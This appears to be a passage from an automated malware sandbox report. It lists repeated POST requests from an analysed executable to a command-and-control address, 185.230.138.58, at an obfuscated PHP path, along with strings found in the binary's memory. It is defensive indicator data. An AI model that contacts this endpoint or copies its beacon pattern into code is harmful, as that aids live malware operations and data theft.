                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1000Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1008Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1868Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.230.138.58
                        Source: unknownHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000035F8000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.000000000328F000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.230.138.58
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.230.138.58/video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.230H
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1727533333.0000000003916000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
